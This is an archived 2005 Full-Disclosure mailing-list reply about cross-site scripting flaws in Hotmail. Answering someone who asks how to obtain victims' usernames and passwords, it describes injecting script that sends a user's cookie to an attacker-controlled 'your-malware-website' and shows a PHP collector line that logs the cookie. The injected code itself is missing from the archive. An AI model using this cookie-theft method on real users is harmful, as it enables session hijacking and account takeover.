lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 4 May 2005 14:41:15 +0200
From: "Jerome Athias" <>
To: "Sherwyn Williams" <>,
	"Luis A. Cortes Zavala" <>,
	<>, <>,
Subject: Re: Re: [VulnWatch] Hotmail Advisories

> Ok I think I get what you are saying, however to use this vuln, would
> need to have a script running on a server some where that recieves the 
> username and password?
> Or just based on what you have here this can be possible. If one does not 
> have knowledge of java script, all the would have to do is use those 
> various html codes you wrote and send that to them as an attachment, but 
> how would I get the username and password ????

For example, this is a simple way to steal a cookie:

Inject this code:


And on "your-malware-website" put this page:

echo $HTTP_COOKIE_VARS["cook"];

and so, the cookie will be logged in "your-malware-website"

>> I was testing this until I can get some working code, the authorization 
>> and
>> validation of the site is one of the better that I seen on a mailing 
>> system,
>> I never heard about vulnerabilities of hotmail as in others systems, I 
>> just
>> have knowledge of two flaws discovered. One on 1999 is from George 
>> Guninski,
>> and the other when the pwdreset function make its public, every year 
>> hotmail
>> is updated, and getting more secure, and it's hard to believe that no one
>> have found this before.

Try to play with this in hotmail


Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists